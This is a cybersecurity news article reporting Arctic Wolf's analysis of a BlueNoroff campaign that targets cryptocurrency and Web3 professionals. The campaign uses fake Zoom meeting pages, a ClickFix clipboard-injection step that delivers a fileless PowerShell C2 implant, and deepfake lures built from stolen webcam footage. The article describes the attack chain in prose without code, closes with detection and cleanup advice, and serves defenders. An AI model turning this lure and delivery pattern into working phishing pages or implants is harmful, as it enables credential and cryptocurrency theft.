New BlueNoroff Campaign Uses Fileless PowerShell and AI-Generated Zoom Lures

HomeCyber Security News New BlueNoroff Campaign Uses Fileless PowerShell and AI-Generated Zoom Lures By Tushar Subhra Dutta April 29, 2026 A dangerous new cyber campaign from North Korea’s Lazarus Group is targeting cryptocurrency and Web3 professionals using fake Zoom meeting interfaces, fileless PowerShell scripts, and AI-generated deepfake content. The group behind this activity is BlueNoroff, a financially motivated subgroup known for stealing digital assets. This campaign has spread across more than 20 countries, with the United States making up 41% of all identified victims. The attack begins with a spear-phishing email. The threat actor pretends to be a legal professional in the Fintech space and sends a Calendly invite to the target. Once the victim confirms the meeting, the attacker quietly replaces the Google Meet link with a typo-squatted Zoom URL designed to look nearly identical to a real one. When the victim clicks the fake link, their browser loads a self-contained HTML page that looks exactly like the Zoom meeting interface, complete with fake participant video tiles, looping footage, and a cycling active speaker indicator. Arctic Wolf analysts identified this targeted intrusion against a North American Web3 and cryptocurrency company, attributing it with high confidence to BlueNoroff, also tracked as APT38, Sapphire Sleet, and Stardust Chollima. Researchers found that the full attack chain, from the initial click to complete system compromise, finished in under five minutes. Forensic analysis confirmed the attacker maintained persistent access on the victim’s device for 66 days, stealing browser credentials, Telegram session data, and live webcam footage that was then reused to build more convincing lures for future targets. What makes this campaign especially damaging is its self-reinforcing deepfake production pipeline. Analysts uncovered more than 950 files on the attacker’s hosting server, including AI-generated headshot images confirmed via C2PA cryptographic metadata as outputs of OpenAI’s GPT-4o model, real webcam footage stolen from prior victims, and deepfake composite videos. DM screenshot showing a compromised Telegram account impersonating a previous victim (Source – Arctic Wolf) Each successful attack feeds raw material into the next, making future meetings more convincing. CEOs and founders account for 45% of all identified targets, reflecting BlueNoroff’s focus on individuals with direct access to cryptocurrency assets and wallet infrastructure. The ClickFix Payload Delivery Once the victim enters the fake Zoom meeting, a persistent overlay appears claiming the user’s SDK is outdated and needs an update. This is a ClickFix-style clipboard injection attack. The victim sees what look like harmless diagnostic commands and is told to copy and paste them into the Windows Run dialog or terminal. What they do not realize is that the page silently replaces the clipboard content with a hidden PowerShell execution command the moment they copy it. Zoom-branded fake meeting interface with ‘SDK deprecated’ overlay (Source – Arctic Wolf) The injected PowerShell command downloads an obfuscated second-stage script from the attacker’s command-and-control server and saves it to the user’s Temp folder as a file named chromechip.log. That file runs in a hidden window, installing a persistent C2 beacon that operates entirely in memory and contacts the attacker every five seconds. The implant collects hostname, OS version, running processes, admin privileges, and timezone data, packaging everything into a structured JSON beacon sent to a remote server. Decoded PowerShell C2 implant showing system profiling routine and JSON beacon structure (Source – Arctic Wolf) Organizations in Web3, cryptocurrency, and financial services should verify all meeting links through a secondary communication method before joining any call. Legitimate platforms never ask users to run terminal commands to fix audio or camera issues. Security teams should block identified C2 addresses, remove the Startup shortcut called Chrome Update Certificated.lnk, and delete chromechip.log and chrome-debug-data001.log from affected devices. All browser-stored passwords, API keys, and cryptocurrency wallet credentials must be rotated immediately. PowerShell Script Block Logging should be enabled on all endpoints to support early detection of obfuscated payload execution. Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google. Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Tushar Subhra Dutta Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics. Trending News Hackers Abuse Compromised Routers to Hide China-Linked Cyber Operations Microsoft Warns Jasper Sleet Uses Fake IT Worker Identities to Infiltrate Cloud Environments Vercel Confirms Security Breach – Set of Customer Account Compromised New Silver Fox Campaign Uses Fake Tax Audit Alerts and Software Updates to Deliver Malware New Windows 0-Click Vulnerability Exploited to Bypass Defender SmartScreen Latest News ANY.RUN New BlobPhish Attack Leverages Browser Blob Objects to Steal Users’ Login Credentials Cyber Security Critical GitHub.com and Enterprise Server RCE Vulnerability Enables Full Server Compromise Cyber Security Microsoft Confirms Remote Desktop Warnings May Display Incorrectly After April Update Cyber Security News Checkmarx Confirms GitHub Repository Data Published on Dark Web Cyber Security News Critical LiteLLM SQL Injection Vulnerability Exploited in the Wild